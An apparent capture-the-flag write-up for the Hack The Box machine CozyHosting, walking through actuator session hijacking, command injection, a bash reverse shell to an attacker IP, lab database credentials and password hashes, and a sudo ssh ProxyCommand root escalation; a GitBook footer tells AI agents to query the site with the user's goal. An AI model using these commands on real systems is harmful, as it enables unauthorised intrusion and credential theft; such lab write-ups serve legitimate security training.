> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-cozyhosting.md).

# HTB - CozyHosting

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FN8xJa4zY21gROyAhEZWo%2Fimage.png?alt=media&amp;token=e5ecf51a-c5ff-4480-a6c8-40554f47fa40" alt=""><figcaption></figcaption></figure>

add to hosts file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6FIhvPuE3X0ojD0LCCX5%2Fimage.png?alt=media&amp;token=9b662f23-6029-492d-8271-3506aa501722" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyRuDA3SLHS3nfkYSKHe8%2Fimage.png?alt=media&amp;token=b28cb5a8-b5d6-48a9-9bdc-48fedcf46db7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9ecV9SGHslWJEnstD4uB%2Fimage.png?alt=media&amp;token=b744947d-3a96-407a-8b0e-76dd73728683" alt=""><figcaption></figcaption></figure>

directory enumeration reveals some interesting data.

there is directory called `error` that gives a 500 error.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fl60D4fVbM5SjoU7pEciG%2Fimage.png?alt=media&amp;token=e0967c0f-568f-4645-b645-4869cd84fbc2" alt=""><figcaption></figcaption></figure>

The error **`There was an unexpected error (type=None, status=999)`** is a generic fallback error page typically generated by a **Java Spring Boot backend using Spring Security**. The `status=999` indicates a non-standard HTTP status code, which means a background system process failed or deliberately blocked your connection.&#x20;

There is also an actuator directory. I dont know what it is but poking around found this:

A Spring Boot Actuator directory refers to the set of built-in operational endpoints (such as `/health`, `/env`, and `/metrics`) exposed via HTTP or JMX. By default, hitting the root `/actuator` path returns a JSON directory listing hyperlinking all active management endpoints.

i will fetch the `/actuator` directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEfFmfnrx4gPrbfTTesIv%2Fimage.png?alt=media&amp;token=af5787fe-9dd4-4419-a8aa-43c7a078bfd6" alt=""><figcaption></figcaption></figure>

fetching the directory revealed internal endpoints.

getting sessions revealed a username

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FP9dMnHFGn8Ly51umUEXZ%2Fimage.png?alt=media&amp;token=b66c5e1b-0ce8-421f-a9ac-fdd3a36561ec" alt=""><figcaption></figcaption></figure>

`kanderson`

fetching the mappings endpoint reveals another endpoint called `/executessh` through which we can send POST request.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMAQ2FRslagfldbiBQl8F%2Fimage.png?alt=media&amp;token=56c9a0e8-12bd-406b-8b4e-d331c580d139" alt=""><figcaption></figcaption></figure>

it takes two parameter.

but since i have the session key of Anderson i will first get his access.

to get access complete a invalid logon to populate the session cookie and replace the cookie.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUEQPJuWT9ZRNUiERyrLw%2Fimage.png?alt=media&amp;token=75cff04b-d3a1-415a-9194-7a3360859be1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxtK0chsZioOp1rQmRwk2%2Fimage.png?alt=media&amp;token=f1a20837-4872-43af-a642-e075f458ac9b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fr1dHNRjkNejaHYw6Cfil%2Fimage.png?alt=media&amp;token=7e00359a-a5dd-4c7f-8e5c-20049fc71f1b" alt=""><figcaption></figcaption></figure>

we need to replace the `JSESSIONID` in every request else we will be redirected to login page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnI5rkt1nhZsJCP2AhTtT%2Fimage.png?alt=media&amp;token=57208ae9-29c1-4f8b-a6b6-4afdccf268d6" alt=""><figcaption></figcaption></figure>

takes two parameters, i can use burp to see which it endpoint it makes request too.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fd0A9jzMFRHKT12bALRJw%2Fimage.png?alt=media&amp;token=e36d2fcb-f309-4b76-96d2-60077e7a9d0b" alt=""><figcaption></figcaption></figure>

it makes request to the `/executessh` endpoint. i can test this for vulnerabilities like injection based attacks.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZyJTMw4eyt0lF1zkZLxo%2Fimage.png?alt=media&amp;token=5cdca305-ee97-42c0-9224-4e5c4ce5d096" alt=""><figcaption></figcaption></figure>

sending the normal request says host key verification failed.

testing for sql injection gives weird error i haven’t seen before LOL

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvQ4HPaL7mcFgqTzxHyEn%2Fimage.png?alt=media&amp;token=c50f8c74-ffcf-4980-a6d4-e4df3eedb4ac" alt=""><figcaption></figcaption></figure>

* The `username` parameter is being unsafely interpolated into a shell command executed with `bash -c`.
* The submitted value `kanderson'`  breaks out of an existing quoted string, causing a syntax error. The server responds with a `302` redirect containing the Bash error message in the `Location` header, confirming that the shell is parsing the input.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOsQO6Cz3JKjJul55HFGB%2Fimage.png?alt=media&amp;token=593ac431-20fc-46ff-80ec-c2e6b49a5857" alt=""><figcaption></figcaption></figure>

lets url encode and send.

testing everything result in host key verification error. That said  i will try to make it to send request to my machine confirming blind command injection.

### Blind Command Injection

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWd4PqLBPoaQUHo7EwqfV%2Fimage.png?alt=media&amp;token=da7bcc8c-7ccb-4f5d-a1ec-509963d690be" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FT0SCVq7SrRQ5Nx6pl7Cj%2Fimage.png?alt=media&amp;token=fb9bafd0-a650-433b-a156-db020dfd61a1" alt=""><figcaption></figcaption></figure>

command injection confirmed that said i will get the shell.

i will host a script file  on my machine to get the reverse shell.

```bash
┌──(ajay㉿kali)-[~]
└─$ cat script.sh
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.49/4444 0>&1
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdCaWNqNYMoDDYIxa74c5%2Fimage.png?alt=media&amp;token=421d39fc-4fb7-4ac1-8e1a-e8418ed6cec8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMjXJ4W5HyneQvuVBthPl%2Fimage.png?alt=media&amp;token=a304ec89-6260-4a96-a3da-701e3e9a37ed" alt=""><figcaption></figcaption></figure>

now i will submit another request to execute the script.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoznhkNlzFbrAhTKEeDN6%2Fimage.png?alt=media&amp;token=48d6daf1-1bb1-4674-b6e6-0296fc35c253" alt=""><figcaption></figcaption></figure>

## Shell as App

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzqcYeii9D1Nmg5EDdc3C%2Fimage.png?alt=media&amp;token=62f40c29-dd7b-4314-94aa-8d32726d59e9" alt=""><figcaption></figcaption></figure>

```bash
app@cozyhosting:/app$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
app@cozyhosting:/app$ export TERM=xterm
export TERM=xterm
app@cozyhosting:/app$ 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMXUfbAaQm7ybsZn1qt5B%2Fimage.png?alt=media&amp;token=155d68b1-6b48-4f6a-b342-3347c7f821f1" alt=""><figcaption></figcaption></figure>

we need to get to josh to read the user.txt

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNdzeevNAF4Dp5a648mmm%2Fimage.png?alt=media&amp;token=33d4cccd-dc17-4523-bf1c-d3a2c2446501" alt=""><figcaption></figcaption></figure>

there is nothing much details on the machine so we need to probably unzip the jar file for further extending access.

#### Unzipping JAR File

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdoLsDGM6racHxn629bte%2Fimage.png?alt=media&amp;token=63dbfdbb-1f6f-4988-931b-750e53810fb9" alt=""><figcaption></figcaption></figure>

do not have permission to unzip in the current directory

will try to move it to tmp directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8V14iO7NToHMgaghSKKx%2Fimage.png?alt=media&amp;token=102ab300-7f52-4e65-a99a-5b24a34d886c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhoYGWreoGGtbxxiqC40Z%2Fimage.png?alt=media&amp;token=62a29118-878c-4919-ac5f-dd9a007e02f1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4eC8e38CS9fgLjHzyokk%2Fimage.png?alt=media&amp;token=c64ae021-6c29-4c5a-9e22-1eb6a225914b" alt=""><figcaption></figcaption></figure>

found the database credentials.

#### Connecting to Postgres Database.

```wasm
psql -h localhost -U postgres -d cozyhosting -W
Password: Vg&nvzAQ7XxR

psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

cozyhosting=# 

```

i can also use python to connect to the database

```bash
python3 -c "import psycopg2; conn=psycopg2.connect(host='localhost', dbname='cozyhosting', user='postgres', password='Vg&nvzAQ7XxR'); cur=conn.cursor(); cur.execute('SELECT table_name FROM information_schema.tables WHERE table_schema=\'public\''); print(cur.fetchall())"bash
```

```ada
\list  #list database names
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7sGaga0W3dRLZiCVX7b6%2Fimage.png?alt=media&amp;token=c87fcd24-c010-4a1c-a763-ac9ce6e441b9" alt=""><figcaption></figcaption></figure>

```
\dt #list tables
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5fwnu6oGaAYsEYf3S02L%2Fimage.png?alt=media&amp;token=6e194189-3229-45b7-b15b-3b29a56913c2" alt=""><figcaption></figcaption></figure>

```
select * from users;
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F56w2Gx3xqem0xv0AHp0L%2Fimage.png?alt=media&amp;token=a8a30dc6-5424-466f-889a-79127f2270b8" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ cat hashes.txt 
kanderson:$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim
admin:$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fz5sduNgGSgMuIC7qHQNK%2Fimage.png?alt=media&amp;token=cca88dbf-3420-4d94-adae-21ed21908aa0" alt=""><figcaption></figcaption></figure>

the password works for josh.

## Shell as Josh

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdSdqMCjfNfiYC9q2dNVN%2Fimage.png?alt=media&amp;token=a31bb738-32f0-4943-8808-135149ef7619" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjTJ18Mr6ABtGDwl1nNoV%2Fimage.png?alt=media&amp;token=9da22054-735f-4fde-bb3b-7b58370dd0d2" alt=""><figcaption></figcaption></figure>

josh can run ssh as root.

### Abusing SSH Sudo Privilege

{% embed url="<https://gtfobins.org/gtfobins/ssh/>" %}

gtfo bins has a page to abuse this privilege.

```bash
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
```

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWESJlnOn4871kmuO7ol2%2Fimage.png?alt=media&amp;token=84bb40d9-47cb-4ed4-8df4-23685191f419" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-cozyhosting.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
